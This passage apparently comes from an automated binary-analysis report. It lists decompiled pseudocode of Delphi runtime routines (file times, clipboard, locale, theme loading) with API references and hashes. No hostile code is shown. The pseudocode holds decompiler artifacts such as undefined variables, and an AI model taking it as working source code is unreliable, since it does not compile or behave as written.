                                  					_v8 = 0xffffffff;
                                  				} else {
                                  					FindClose(_t16);
                                  					if((_v336.dwFileAttributes & 0x00000010) != 0) {
                                  						goto L3;
                                  					} else {
                                  						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
                                  						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  				return _v8;
                                  			}









                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00409233
                                  • FindClose.KERNEL32(00000000,00000000,?), ref: 0040923E
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00409257
                                  • FileTimeToDosDateTime.KERNEL32 ref: 00409268
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: FileTime$Find$CloseDateFirstLocal
                                  • String ID:
                                  • API String ID: 2659516521-0
                                  • Opcode ID: a6b4e9ad5fb658419c70fb21aeeefd77df78213f01bbc53f8a9f7d7aedf4cdd4
                                  • Instruction ID: b70f1ebf6ec9cd1db3f46cd636bcf547bc68ec0b8eaaa5dc923b172fd8b3778f
                                  • Opcode Fuzzy Hash: a6b4e9ad5fb658419c70fb21aeeefd77df78213f01bbc53f8a9f7d7aedf4cdd4
                                  • Instruction Fuzzy Hash: 61F09C7690020CA6CF10EAE58C859CFB3AC9B09324F5146B7A51AF21D2EA799A548B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042C3D4(intOrPtr* __eax, void* __ecx, void* __edx) {
                                  				intOrPtr _v68;
                                  				intOrPtr _v72;
                                  				intOrPtr _v76;
                                  				struct tagENHMETAHEADER _v104;
                                  				void* __ebp;
                                  				intOrPtr _t35;
                                  				intOrPtr* _t37;
                                  				struct HENHMETAFILE__* _t43;
                                  				intOrPtr _t44;
                                  
                                  				_t37 = __eax;
                                  				_t43 = GetClipboardData(0xe);
                                  				if(_t43 == 0) {
                                  					_t35 =  *0x4bb054; // 0x4263bc
                                  					E0042979C(_t35);
                                  				}
                                  				E0042BB74(_t37);
                                  				_t44 =  *((intOrPtr*)(_t37 + 0x28));
                                  				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
                                  				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
                                  				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
                                  				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
                                  				 *((short*)(_t44 + 0x18)) = 0;
                                  				 *((char*)(_t37 + 0x2c)) = 1;
                                  				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
                                  				return  *((intOrPtr*)( *_t37 + 0x10))();
                                  			}













                                  APIs
                                  • GetClipboardData.USER32 ref: 0042C3E1
                                  • CopyEnhMetaFileA.GDI32(00000000,00000000), ref: 0042C403
                                  • GetEnhMetaFileHeader.GDI32(?,00000064,?), ref: 0042C415
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: FileMeta$ClipboardCopyDataHeader
                                  • String ID:
                                  • API String ID: 1752724394-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00465B98() {
                                  				struct tagPOINT _v12;
                                  				void* _t5;
                                  				long _t6;
                                  
                                  				 *0x4bcb8c = GetCurrentThreadId();
                                  				L5:
                                  				_t5 =  *0x4bcb90; // 0x0
                                  				_t6 = WaitForSingleObject(_t5, 0x64);
                                  				if(_t6 == 0x102) {
                                  					if( *0x4bcb7c != 0 &&  *((intOrPtr*)( *0x4bcb7c + 0x60)) != 0) {
                                  						GetCursorPos( &_v12);
                                  						if(E00445594( &_v12) == 0) {
                                  							E00468150( *0x4bcb7c);
                                  						}
                                  					}
                                  					goto L5;
                                  				}
                                  				return _t6;
                                  			}







                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00465BA4
                                  • GetCursorPos.USER32(?), ref: 00465BC1
                                  • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00465BE1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CurrentCursorObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 1359611202-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044C6C8(intOrPtr* __eax, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				void* __ecx;
                                  				void* _t25;
                                  				intOrPtr* _t31;
                                  				void* _t34;
                                  				intOrPtr* _t37;
                                  				void* _t45;
                                  
                                  				_v8 = __edx;
                                  				_t37 = __eax;
                                  				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
                                  					L8:
                                  					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
                                  						L10:
                                  						return  *((intOrPtr*)( *_t37 - 0x10))();
                                  					}
                                  					_t25 = E0044C618(_t37, _t45);
                                  					if(_t25 == 0) {
                                  						goto L10;
                                  					}
                                  				} else {
                                  					_t31 =  *0x4bb048; // 0x4bcb7c
                                  					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
                                  						goto L8;
                                  					} else {
                                  						_t34 = E0045E640(_t37);
                                  						_t44 = _t34;
                                  						if(_t34 == 0) {
                                  							goto L8;
                                  						} else {
                                  							_t25 = E00447F3C(_t44, 0, 0xb017, _v8);
                                  							if(_t25 == 0) {
                                  								goto L8;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t25;
                                  			}











                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CaptureIconic
                                  • String ID:
                                  • API String ID: 2277910766-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E0042982C(void* __ebx) {
                                  				char _v260;
                                  				char _v264;
                                  				long _t21;
                                  				void* _t22;
                                  				intOrPtr _t27;
                                  				void* _t32;
                                  
                                  				_v264 = 0;
                                  				_push(_t32);
                                  				_push(0x4298c8);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t32 + 0xfffffefc;
                                  				_t21 = GetLastError();
                                  				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
                                  					E004297D8(_t22);
                                  				} else {
                                  					E00404648( &_v264, 0x100,  &_v260);
                                  					E0040CAC4(_v264, 1);
                                  					E00403DEC();
                                  				}
                                  				_pop(_t27);
                                  				 *[fs:eax] = _t27;
                                  				_push(0x4298cf);
                                  				return E004043D8( &_v264);
                                  			}










                                  APIs
                                  • GetLastError.KERNEL32(00000000,004298C8), ref: 0042984C
                                  • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,004298C8), ref: 00429872
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID:
                                  • API String ID: 3479602957-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E0040DA20(int __eax, void* __ebx, void* __eflags) {
                                  				char _v11;
                                  				char _v16;
                                  				intOrPtr _t28;
                                  				void* _t31;
                                  				void* _t33;
                                  
                                  				_t33 = __eflags;
                                  				_v16 = 0;
                                  				_push(_t31);
                                  				_push(0x40da84);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t31 + 0xfffffff4;
                                  				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
                                  				E00404648( &_v16, 7,  &_v11);
                                  				_push(_v16);
                                  				E00408EF0(7, GetACP(), _t33);
                                  				_pop(_t28);
                                  				 *[fs:eax] = _t28;
                                  				_push(E0040DA8B);
                                  				return E004043D8( &_v16);
                                  			}









                                  APIs
                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040DA84), ref: 0040DA46
                                  • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040DA84), ref: 0040DA5F
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E004709EC(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				char _v32;
                                  				intOrPtr _t28;
                                  				intOrPtr _t29;
                                  				void* _t33;
                                  				void* _t34;
                                  				intOrPtr _t35;
                                  				void* _t36;
                                  
                                  				_t36 = __eflags;
                                  				_t27 = __edx;
                                  				_t33 = _t34;
                                  				_t35 = _t34 + 0xffffffe4;
                                  				_v12 = 0;
                                  				_v32 = 0;
                                  				_v8 = __eax;
                                  				_push(_t33);
                                  				_push(0x470acc);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t35;
                                  				_push(_t33);
                                  				_push(0x470a47);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t35;
                                  				_push(E004060A8(__edx));
                                  				_push(0x470adc);
                                  				_push(5);
                                  				_push(_v8);
                                  				L004197BC();
                                  				E0047097C(_v8, _t27, _t36);
                                  				_pop(_t28);
                                  				 *[fs:eax] = _t28;
                                  				_t29 = 0;
                                  				 *[fs:eax] = _t29;
                                  				_push(0x470ad3);
                                  				E004043D8( &_v32);
                                  				return E004043D8( &_v12);
                                  			}













                                  APIs
                                  • CoCreateInstance.OLE32(?,00000000,00000005,00470ADC,00000000), ref: 00470A33
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CreateInstance
                                  • String ID:
                                  • API String ID: 542301482-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E004065C4(int __eax, void* __ebx, void* __eflags) {
                                  				char _v8;
                                  				char _v15;
                                  				char _v20;
                                  				intOrPtr _t29;
                                  				void* _t32;
                                  
                                  				_v20 = 0;
                                  				_push(_t32);
                                  				_push(0x40662a);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t32 + 0xfffffff0;
                                  				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                  				E00404648( &_v20, 7,  &_v15);
                                  				E0040303C(_v20,  &_v8);
                                  				if(_v8 != 0) {
                                  				}
                                  				_pop(_t29);
                                  				 *[fs:eax] = _t29;
                                  				_push(E00406631);
                                  				return E004043D8( &_v20);
                                  			}









                                  APIs
                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040662A), ref: 004065EA
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E00429DC8(intOrPtr __eax, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v48;
                                  				struct _SYSTEM_INFO* _t17;
                                  				unsigned int _t20;
                                  				unsigned int _t22;
                                  				signed int _t31;
                                  				intOrPtr _t33;
                                  
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t17 =  &_v48;
                                  				GetSystemInfo(_t17);
                                  				_t33 = _v8;
                                  				_t31 = _v12 - 1;
                                  				if(_t31 >= 0) {
                                  					if( *((short*)( &_v48 + 0x20)) == 3) {
                                  						do {
                                  							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
                                  							 *(_t33 + _t31 * 4) = _t20;
                                  							_t31 = _t31 - 1;
                                  						} while (_t31 >= 0);
                                  						return _t20;
                                  					} else {
                                  						goto L2;
                                  					}
                                  					do {
                                  						L2:
                                  						asm("bswap eax");
                                  						_t22 =  *(_t33 + _t31 * 4) >> 8;
                                  						 *(_t33 + _t31 * 4) = _t22;
                                  						_t31 = _t31 - 1;
                                  					} while (_t31 >= 0);
                                  					return _t22;
                                  				}
                                  				return _t17;
                                  			}

                                  APIs
                                  • GetSystemInfo.KERNEL32(?), ref: 00429DD8
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: InfoSystem
                                  • String ID:
                                  • API String ID: 31276548-0
                                  • Opcode ID: 5e2f2624044a32240e7566b92594acfb1dffa846b7424f25bef424e43b4a380f
                                  • Instruction ID: 5a237fac07845009f4f8ec86c24644310e80be9a72e05ab7953e6261f48075f9
                                  • Opcode Fuzzy Hash: 5e2f2624044a32240e7566b92594acfb1dffa846b7424f25bef424e43b4a380f
                                  • Instruction Fuzzy Hash: B4F09671E011199FCB14DF98D48489DB7B4FB66305B9142AAD404E7382EB74AE54C7C5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040C2D4(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                  				char _v260;
                                  				intOrPtr _t10;
                                  				void* _t18;
                                  
                                  				_t18 = __ecx;
                                  				_t10 = _a4;
                                  				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
                                  					return E0040442C(_t10, _t18);
                                  				}
                                  				return E004044C8(_t10, _t5 - 1,  &_v260);
                                  			}

                                  APIs
                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C2F2
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: e2a38c654fad3b4e6efe02a43aa545c26fc6c6b9a1f523559b18ceb72db4b18d
                                  • Instruction ID: 1e77536608864a37f64fe0a1a8f9f747dc091ed908a88cf74d547517d746a1a0
                                  • Opcode Fuzzy Hash: e2a38c654fad3b4e6efe02a43aa545c26fc6c6b9a1f523559b18ceb72db4b18d
                                  • Instruction Fuzzy Hash: D8E0927271021457D310A6A94C82EEA726C9798310F10437FBE09E73C2EEB49D8046ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0040C320(int __eax, char __ecx, int __edx) {
                                  				char _v16;
                                  				char _t5;
                                  				char _t6;
                                  
                                  				_push(__ecx);
                                  				_t6 = __ecx;
                                  				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                  					_t5 = _t6;
                                  				} else {
                                  					_t5 = _v16;
                                  				}
                                  				return _t5;
                                  			}

                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040DD36,00000000,0040DF4F,?,?,00000000,00000000), ref: 0040C333
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: ec1090fa1e2e456b02f9cbd3040865e7c905817e4b997f7296a5e9ed8b6200f1
                                  • Instruction ID: 072b29b42b202bf044db22afaac70db5c53f3ea32f29db0e7d303ef2c0dd6531
                                  • Opcode Fuzzy Hash: ec1090fa1e2e456b02f9cbd3040865e7c905817e4b997f7296a5e9ed8b6200f1
                                  • Instruction Fuzzy Hash: 0BD05E6631D2506AE210529F2D85EBF5AACCBC97A0F10813EB988D7242D2249C0693B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040ACD8() {
                                  				struct _SYSTEMTIME* _t2;
                                  
                                  				GetLocalTime(_t2);
                                  				return _t2->wYear;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID:
                                  • API String ID: 481472006-0
                                  • Opcode ID: 8e4ca7561e72912d9e22cb76723d5aa4fa78e16197ffc9af2d9a726632b7f064
                                  • Instruction ID: d6c42b8bd36005bec1de40505e99cefee692518481bdf545af149528a61a9b8e
                                  • Opcode Fuzzy Hash: 8e4ca7561e72912d9e22cb76723d5aa4fa78e16197ffc9af2d9a726632b7f064
                                  • Instruction Fuzzy Hash: 15A0120840481101C54033180C0355430605801720FC4075468B8503E1E92D1230819B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00432C10(void* __ebx, void* __ecx) {
                                  				char _v5;
                                  				intOrPtr _t2;
                                  				intOrPtr _t6;
                                  				intOrPtr _t108;
                                  				intOrPtr _t111;
                                  
                                  				_t2 =  *0x4bca4c; // 0x1c41924
                                  				E00432A08(_t2);
                                  				_push(_t111);
                                  				_push(0x432fc3);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t111;
                                  				 *0x4bca48 =  *0x4bca48 + 1;
                                  				if( *0x4bca44 == 0) {
                                  					 *0x4bca44 = LoadLibraryA("uxtheme.dll");
                                  					if( *0x4bca44 > 0) {
                                  						 *0x4bc984 = GetProcAddress( *0x4bca44, "OpenThemeData");
                                  						 *0x4bc988 = GetProcAddress( *0x4bca44, "CloseThemeData");
                                  						 *0x4bc98c = GetProcAddress( *0x4bca44, "DrawThemeBackground");
                                  						 *0x4bc990 = GetProcAddress( *0x4bca44, "DrawThemeText");
                                  						 *0x4bc994 = GetProcAddress( *0x4bca44, "GetThemeBackgroundContentRect");
                                  						 *0x4bc998 = GetProcAddress( *0x4bca44, "GetThemeBackgroundContentRect");
                                  						 *0x4bc99c = GetProcAddress( *0x4bca44, "GetThemePartSize");
                                  						 *0x4bc9a0 = GetProcAddress( *0x4bca44, "GetThemeTextExtent");
                                  						 *0x4bc9a4 = GetProcAddress( *0x4bca44, "GetThemeTextMetrics");
                                  						 *0x4bc9a8 = GetProcAddress( *0x4bca44, "GetThemeBackgroundRegion");
                                  						 *0x4bc9ac = GetProcAddress( *0x4bca44, "HitTestThemeBackground");
                                  						 *0x4bc9b0 = GetProcAddress( *0x4bca44, "DrawThemeEdge");
                                  						 *0x4bc9b4 = GetProcAddress( *0x4bca44, "DrawThemeIcon");
                                  						 *0x4bc9b8 = GetProcAddress( *0x4bca44, "IsThemePartDefined");
                                  						 *0x4bc9bc = GetProcAddress( *0x4bca44, "IsThemeBackgroundPartiallyTransparent");
                                  						 *0x4bc9c0 = GetProcAddress( *0x4bca44, "GetThemeColor");
                                  						 *0x4bc9c4 = GetProcAddress( *0x4bca44, "GetThemeMetric");
                                  						 *0x4bc9c8 = GetProcAddress( *0x4bca44, "GetThemeString");
                                  						 *0x4bc9cc = GetProcAddress( *0x4bca44, "GetThemeBool");
                                  						 *0x4bc9d0 = GetProcAddress( *0x4bca44, "GetThemeInt");
                                  						 *0x4bc9d4 = GetProcAddress( *0x4bca44, "GetThemeEnumValue");
                                  						 *0x4bc9d8 = GetProcAddress( *0x4bca44, "GetThemePosition");
                                  						 *0x4bc9dc = GetProcAddress( *0x4bca44, "GetThemeFont");
                                  						 *0x4bc9e0 = GetProcAddress( *0x4bca44, "GetThemeRect");
                                  						 *0x4bc9e4 = GetProcAddress( *0x4bca44, "GetThemeMargins");
                                  						 *0x4bc9e8 = GetProcAddress( *0x4bca44, "GetThemeIntList");
                                  						 *0x4bc9ec = GetProcAddress( *0x4bca44, "GetThemePropertyOrigin");
                                  						 *0x4bc9f0 = GetProcAddress( *0x4bca44, "SetWindowTheme");
                                  						 *0x4bc9f4 = GetProcAddress( *0x4bca44, "GetThemeFilename");
                                  						 *0x4bc9f8 = GetProcAddress( *0x4bca44, "GetThemeSysColor");
                                  						 *0x4bc9fc = GetProcAddress( *0x4bca44, "GetThemeSysColorBrush");
                                  						 *0x4bca00 = GetProcAddress( *0x4bca44, "GetThemeSysBool");
                                  						 *0x4bca04 = GetProcAddress( *0x4bca44, "GetThemeSysSize");
                                  						 *0x4bca08 = GetProcAddress( *0x4bca44, "GetThemeSysFont");
                                  						 *0x4bca0c = GetProcAddress( *0x4bca44, "GetThemeSysString");
                                  						 *0x4bca10 = GetProcAddress( *0x4bca44, "GetThemeSysInt");
                                  						 *0x4bca14 = GetProcAddress( *0x4bca44, "IsThemeActive");
                                  						 *0x4bca18 = GetProcAddress( *0x4bca44, "IsAppThemed");
                                  						 *0x4bca1c = GetProcAddress( *0x4bca44, "GetWindowTheme");
                                  						 *0x4bca20 = GetProcAddress( *0x4bca44, "EnableThemeDialogTexture");
                                  						 *0x4bca24 = GetProcAddress( *0x4bca44, "IsThemeDialogTextureEnabled");
                                  						 *0x4bca28 = GetProcAddress( *0x4bca44, "GetThemeAppProperties");
                                  						 *0x4bca2c = GetProcAddress( *0x4bca44, "SetThemeAppProperties");
                                  						 *0x4bca30 = GetProcAddress( *0x4bca44, "GetCurrentThemeName");
                                  						 *0x4bca34 = GetProcAddress( *0x4bca44, "GetThemeDocumentationProperty");
                                  						 *0x4bca38 = GetProcAddress( *0x4bca44, "DrawThemeParentBackground");
                                  						 *0x4bca3c = GetProcAddress( *0x4bca44, "EnableTheming");
                                  					}
                                  				}
                                  				_v5 =  *0x4bca44 > 0;
                                  				_pop(_t108);
                                  				 *[fs:eax] = _t108;
                                  				_push(0x432fca);
                                  				_t6 =  *0x4bca4c; // 0x1c41924
                                  				return E00432A10(_t6);
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00432C46
                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432C5E
                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432C70
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432C82
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432C94
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432CA6
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432CB8
                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000), ref: 00432CCA
